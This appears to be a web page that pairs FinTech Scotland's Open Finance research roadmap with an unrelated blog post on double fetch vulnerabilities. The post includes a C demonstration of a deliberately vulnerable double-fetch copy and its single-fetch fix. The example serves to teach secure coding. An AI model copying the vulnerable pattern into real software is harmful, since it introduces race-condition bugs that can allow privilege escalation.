Open Finance can create progressive change that will move the UK forward significantly, by moving beyond banking and asking other financial institutions (such as pension providers, asset managers and insurers) to enable customers to share their data with others.

This would open up a wider range of financial products and services to the transformative impact of third-party innovation through trusted data sharing. For consumers and businesses, it offers new ways to understand their finances, receive financial advice, and compare financial product features and prices.

Research and innovation are needed to facilitate the potential of Open Finance data, building economic growth and creating employment opportunities in high value sectors which in turn will make the UK an attractive destination for inward investment.

Furthermore, it will help us better understand, measure, and forecast the considerable impact that Open Finance could have on society and to shape future policy.

In the UK, one of the key enablers of research and innovation in Open Finance is the Smart Data Foundry (formerly The Global Open Finance Centre of Excellence), which has been established in Edinburgh to support the understanding and development of the capabilities of Open Finance. It has a leadership role in enabling the necessary research and innovation, and building confidence in Open Finance across the UK, and can encourage research and innovation by providing a highly secure environment that can host Open Finance data. The Open Finance data priority in FinTech Scotland’s Research & Innovation Roadmap supports and complements The Smart Data Foundry’s agenda.

 

Priority areas in Open Finance data

When developing the Roadmap, analysis highlighted three industry priorities that will benefit from more focused research and innovation on this topic. They involve shaping the future of:

Everyday personal banking and business banking

  • Insights through Open Banking data
  • Future banking business models

Long-term savings and investment

  • Financial resilience and wellbeing
  • Future living & the ageing population

Personal and business insurance

  • New data and insights for insurance
  • Data privacy
  • Data ethics and governance

 

Roadmap next steps: Open Finance data

A range of proposed next steps is laid out in the published report, which specifically identifies 22 actions relating to Open Finance, and categorises each into one of three phases over the next 10 years. These actions are illustrated in the graphic below. The report also references 23 different stakeholders who can support the implementation of these actions, which are broken down into research projects and innovation calls.

Why should tech companies care about double fetch vulnerabilities?

Fintech companies are facing an increasing need to focus on cybersecurity. Whilst cyber-attacks are on the rise and necessitate the constant evolution of cyber-security solutions, very often the issues arise from known vulnerabilities within existing systems.

In this blog we’re exploring double fetch vulnerabilities.

The phrase ‘double fetch bug’ was first used by Fermin J. Serna in a post on the Microsoft Security and Defense Blog in October 2008, although the bug type had been known about for some time before this.

Double fetch vulnerabilities in C and C++ have been known about for a number of years. However, they can appear in multiple forms and can have varying outcomes.

As much of this information is spread across various sources, the whitepaper draws the knowledge together into a single place, in order to better describe the different types of the vulnerability, how each type occurs, and the appropriate fixes.

There are two broad types of double fetch vulnerability: those resulting from coding practices and those introduced by compiler optimization, referred to as a ‘compiler introduced double fetch’ below and in the whitepaper.

The two types of double fetch bug both have the same result, whereby an invariant exists involving two or more variables and one or more of these variables is modified without the invariant being enforced.

Since double fetch bugs can have varying causes, we must consider different solutions for the two different subtypes of double fetch.

  • Double fetch bugs caused by accessing shared memory may be fixed by adding a check against the second fetch, eliminating the second fetch (where practical), or performing the check in a different manner.
  • For compiler-introduced double fetches, the use of volatile variables is one possible solution to the double fetch problem.
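The difference between the two fetch patterns can be seen in a small C program. This is an added example, not code from the whitepaper or from NCC: the struct, function names and sizes are hypothetical, and the "racer" is a deterministic stand-in for a second thread writing to shared memory between the two fetches.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LIMIT 16   /* capacity the length check is meant to enforce */

/* Constructed stand-in for memory shared with a less-trusted writer. */
struct shared_msg { size_t len; unsigned char data[64]; };

/* Simulated concurrent writer: fires once, right after the next fetch. */
static size_t racer_value;
static int racer_armed;

static size_t fetch_len(struct shared_msg *m) {
    /* volatile access: exactly one load, the compiler cannot re-fetch */
    size_t v = *(volatile size_t *)&m->len;
    if (racer_armed) { m->len = racer_value; racer_armed = 0; }
    return v;
}

/* Vulnerable: len is fetched twice, so the check and the use can disagree. */
size_t copy_double_fetch(struct shared_msg *m, unsigned char *dst) {
    if (fetch_len(m) > LIMIT) return 0;   /* first fetch: check */
    size_t n = fetch_len(m);              /* second fetch: use */
    memcpy(dst, m->data, n);
    return n;                             /* bytes copied */
}

/* Fixed: one fetch into a local; check and copy use the same value. */
size_t copy_single_fetch(struct shared_msg *m, unsigned char *dst) {
    size_t n = fetch_len(m);
    if (n > LIMIT) return 0;
    memcpy(dst, m->data, n);
    return n;
}

/* One call during which the writer changes len from 8 to 48. */
size_t run_race(size_t (*copy)(struct shared_msg *, unsigned char *)) {
    static struct shared_msg m;
    unsigned char dst[64];   /* oversized so the demo itself stays in bounds */
    m.len = 8; racer_value = 48; racer_armed = 1;
    return copy(&m, dst);
}

int main(void) {
    printf("double fetch copied %zu bytes (limit %d)\n", run_race(copy_double_fetch), LIMIT);
    printf("single fetch copied %zu bytes (limit %d)\n", run_race(copy_single_fetch), LIMIT);
    return 0;
}
```

In the double fetch version the length that passed the check is not the length used by the copy, so the invariant `len <= LIMIT` is broken; the single fetch version copies only the value it validated.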

In conclusion, double fetch bugs can result in privilege escalation vulnerabilities that can allow an attacker with a low privilege account to execute code with elevated privileges, although the exploitable vulnerabilities are a relatively small subset of these bugs.

To understand how to best protect yourself against these vulnerabilities, click here to access the full whitepaper from NCC.